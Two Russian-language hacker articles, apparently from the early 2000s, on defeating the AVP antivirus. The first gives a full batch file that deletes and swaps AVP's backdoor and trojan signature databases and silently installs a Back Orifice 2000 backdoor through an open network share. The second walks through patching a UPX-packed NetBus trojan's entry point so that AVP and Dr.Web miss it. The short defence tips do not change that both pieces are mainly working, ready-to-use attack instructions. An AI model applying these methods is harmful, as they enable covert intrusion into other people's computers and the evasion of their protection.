Как обойти AVP

Цель данной статьи - показать способ взлома вашего компьютера. Автор не несет никакой ответственности за ущерб, который может быть следствием прочтения этого сообщения.

Данный метод работает только на Windows 9x русских версиях (для английских версий необходимо подправить каталог автозапуска), а также при инсталляции Antiviral Toolkit Pro в c:\program files\antiviral toolkit pro\ (по умолчанию).

Рассмотрим следующую ситуацию: есть хост, имеющий общий ресурс С с полным доступом, установленным Antiviral Toolkit Pro. Как положить на него backdoor? Для этого надо заархивировать с паролем (BackdooR) сервер бакдора (будем использовать Back Oriffice 2000). Пароль используется для того, чтобы AVP сканер не смог обнаружить сервер бакдора:

>PKZIP.EXE -a -sBackooR asyslg.dll BO2K.EXE

Теперь AVP не сможет увидеть сигнатуры BO2k в ASYSLG.DLL (если установлена опция проверки архивов).

Затем необходимо обеспечить запуск сервера и обезвредить AVP. Для этого напишем BAT-файл:

@echo off
attrib -R c:\progra~1\antivi~1\backdoor.avc >nul
attrib -R c:\progra~1\antivi~1\trojan.avc >nul
del c:\progra~1\antivi~1\backdoor.avc >nul
del c:\progra~1\antivi~1\trojan.avc >nul
copy c:\progra~1\antivi~1\macro.avc c:\progra~1\antivi~1\backdoor.avc >nul
copy c:\progra~1\antivi~1\mail.avc c:\progra~1\antivi~1\trojan.avc >nul
c:\windows\pkunzip.exe -e -sBackdooR c:\windows\ASYSLG.DLL
C:\Windows\ГЛАВНО~1\ПРОГРА~1\АВТОЗА~1\ >nul
del c:\windows\pkunzip.exe >nul
del c:\windows\asyslg.dll >nul
del c:\winstart.bat >nul
echo on

Расшифровка построчно:

отключение вывода на экран выполняемых команд
снятие атрибута READONLY с файла backdoor.avc (база сигнатур для бакдоров)
снятие атрибута READONLY с файла tojan.avc (база сигнатур для троянов)
удаление файла backdoor.avc
удаление файла tojan.avc
подмена базы (для того, чтобы при запуске сканера AVP не ругался)
подмена базы (отсутствие базы)
разархивация бакдора и помещение его автозагрузку
удаление PKUNZIP
удаление архива с бакдором
удаление файлы запуска

Почему это будет работать? Потому что при старте Windows если в главном каталоге находится файл WINSTART.BAT он запускается на выполнение. При этом пользователь не увидит ни одного сообщения. Затем необходимо скопировать на удаленный компьютер следующие файлы:

ASYSLG.DLL в директорию c:\windows\
PKUNZIP.EXE в директорию c:\windows\
WINSTART.BAT в директорию c:\

Итого необходимо будет закачать 86.508 байт.

Все. После перезагрузки на компьютере из автозагрузки запустится сервер, удалит себя оттуда и запишет себя в c:\windows\system\ (сервер должен быть сконфигурирован на удаление оригинального файла). В принципе, можно использовать архиватор CAB, и проводить распаковывание программой EXTRACT.EXE, которая присутствуют на почти всех компьютерах, что позволит уменьшить размер перекачиваемых данных, однако данный архиватор не позволяет архивировать с паролем, что может привести к обнаружению сервера бакдора сканером (если включена опция проверки архивов).

Рекомендации по защите от данного вида атаки:

1. Закройте все общие ресурсы! Если вы без них жить не можете установите на них пароль (не менее 6 символов и не менее 1 спецсимвола).
2. Поставьте себе Firewall. Даже если эта атака пройдет успешной, получить доступ к вашей системе не удастся - Firewall вас сразу же предупредит о попытке проникновения. Я рекомендую Tiny Personal Firewall.
3. При обнаружении и внезапной пропажи каких-то файлов сразу проверяйте свои диски антивирусом, а также проводите профилактическое сканирование дисков не менее одного раза в неделю.
4. Своевременно обновляйте антивирусные базы.

ZaDNiCa
anonym01@mailru.com

Модифицируем троян или как обойти AVP #2

Прочитав повествование об обмане AVP при посылке трояна на удаленный компьютер я был сказочно обрадован полетом народной мысли :) Но разве можно заниматься таким вредительством, как удаление баз с вирусными сигнатурами - это сакс (не по-кулхацкерски), к тому же каждый дурак любит постоянно обновлять базы - благо на халяву и автоматом :(

Теперь и я хочу поделиться кое-каким методом. Задача стара как мир - не занимаясь написанием своего трояна, надо сделать имеющийся незаметным для антивируса. Итак, нам понадобятся:
1) PE компрессор UPX (http://upx.tsx.org/)
2) Шестнадцатеричный редактор Hiew (http://protools.cjb.net/)
3) ProcDump32 как редактор PE (http://protools.cjb.net/)
4) Минимальные познания в ассемблере
5) Собственно троян. Я взял старый NetBUS (уж что нашлось)
6) Правильно установленный девайс "руки"

Так как же антивирус ищет вирусы и трояны? Какое-то время назад я пообщался с очень умными людьми, которые сообщили мне, что это "Страшная Тайна", и официальной информации я по этому поводу не найду. Но если в вкратце, то антивирус, не обнаружив в файле известных сигнатур (последовательностей байт), применяет "эвристику" - начинает смотреть, что за команды идут в файле, и пытается их эмулировать и "смотреть", что же эти команды могут делать, поскольку не может просто запустить файл, дождаться, пока он сам распакуется/расшифруется в память, дабы случайно не заразить комп, на котором запускается этот файл. Однако многие команды (например, настройку импорта) процессора он не может проэмулировать, поэтому, встретив такие команды, он просто забивает на дальнейшую проверку, даже не говоря о своей некомпетентности :)

К счастью (или нет), все пакеры для оптимизации пишутся настолько через задницу, что антивирус приходит в дикий восторг, т.е. бросает проверку файла, что нам и надо. Тем не менее, у AVP есть набор функций, с помощью которых он может определить, чем запакован файл, и распаковать его по имеющейся схеме, что он и делает в частности для UPX, и обнаруживает трояна в запакованном файле. Основная идея заключается в том, что нам надо изменить распаковщик таким образом, чтобы антивирус не признал в файле известный ему пакер и пропустил проверку. Итак, займемся делом.

Берем файл patch.ex_ из архива original.zip (я его специально так назвал, чтобы ни у кого не было соблазна запустить его, а потом обвинять меня в распространении троянов). Я этот файл уже пожал UPX. Файл определяется AVP как Backdoor.NetBUS.170. Если используете другой троян, то пакуем его с помощью UPX. AVP все равно определяет трояна, но говорит, что файл пожат UPX. Хех, я это и так знаю…Теперь натравливаем на пожатый файл PE Editor из ProcDump32. Нам надо посмотреть адрес точки входа в файл (Entry Point) и адрес загрузки (Image Base). Имеем:

Entry Point: 00082460h
Image Base: 00400000h

Теперь открываем файл в Hex редакторе Hiew. Переходим в режим дизассемблера (F4/Decode). Отправляемся по адресу Entry Point + Image Base = 00482460h (у кого плохо с шестнадцатеричной математикой, может воспользоваться стандартным мастдайским калькулятором - там есть Hex режим). Для этого жмем Goto (F5) и набиваем в качестве адреса ".482460" (точка перед адресом нужна потому что это виртуальный адрес). Видим начало распаковщика - что то вроде этого:

.00482460: 60 pushad
.00482461: BE00304500 mov esi,000453000 ;" E0 "
.00482466: 8DBE00E0FAFF lea edi,[esi][0FFFAE000]
.0048246C: C787B0C405001C340F90 mov d,[edi][00005C4B0],0900F341
.00482476: 57 push edi
.00482477: 83CDFF or ebp,-001 ;" "
.0048247A: EB0E jmps .00048248A

То, что надо. Теперь надо найти свободное место для патча. Пролистаем страниц 6 вниз, и видим немного места забитого нулями - это добрый дядя Билли придумал выравнивание секций. Вот это и нужно было нам. Я выбрал адрес 004825CFh. Теперь подводим курсор к этому адресу и начинаем редактировать файл в ассемблерном режиме (F3/F2). Заколачиваем всего две команды: push OEP и ret (не забывая жать enter после ввода каждой команды :) Где ОЕР это Entry Point + Image Base, т.е. в нашем случае это число 00482460 - для других файлов соответственно будет другое. Итого забили вот что:

Push 00482460
Ret
Сохраняем изменения (F9) и теперь файло выглядит примерно так:

.004825A9: 8903 mov [ebx],eax
.004825AB: 83C304 add ebx,004 ;" "
.004825AE: EBE1 jmps .000482591
.004825B0: FF9698380800 call d,[esi][000083898]
.004825B6: 61 popad
.004825B7: E9B87CFDFF jmp .00045A274
.004825BC: D425 aam 025
.004825BE: 48 dec eax
.004825BF: 00E0 add al,ah
.004825C1: 254800B0D4 and eax,0D4B00048 ;"+_ H"
.004825C6: 45 inc ebp
.004825C7: 0000 add [eax],al <-- Это было забито нулями
.004825C9: 0000 add [eax],al
.004825CB: 0000 add [eax],al
.004825CD: 0000 add [eax],al
.004825CF: 6860244800 push 000482460 ;" H$`" <-- Это наша вставка
.004825D4: C3 retn
.004825D5: 0000 add [eax],al <-- Опять нули
.004825D7: 0000 add [eax],al

Остался последний рывок. Снова открываем файл в PE Editor'е от ProcDump32 и меняем точку входа на адрес нашей вставки, не забыв от виртуально адреса отнять Image Base, т.е. в Entry Point пишем 000825CF (Offset - Image Base = 004825CF - 00400000 = 000825CF). Кто знаком с ассемблером, тот поймет, что было сделано, а кто не знает (sic!) - тому это не нужно :) Вся операция занимает 2-3 минуты и литр пива.

Проверьте полученный файл (лежит в patched.zip) антивирусом. Мой AVP (как сканер, так и монитор) ничего не заметили, даже не сказали что, файл пожат. Вот такой он "народный", "самый лучший" антивирус. Кстати, Dr.Web тоже отсосал и все такое.

Полученный файл прекрасно работает у меня на WinME, как будет он себя вести на Win2k или НТ - Х.З. Я не проверял, но причин для отказа в работе я не вижу. Если у кого-то не получится так сделать - мылить мне не нужно, а надо переустановить драйвера устройства "руки".

Dr.Golova
dr.golova@reversing.net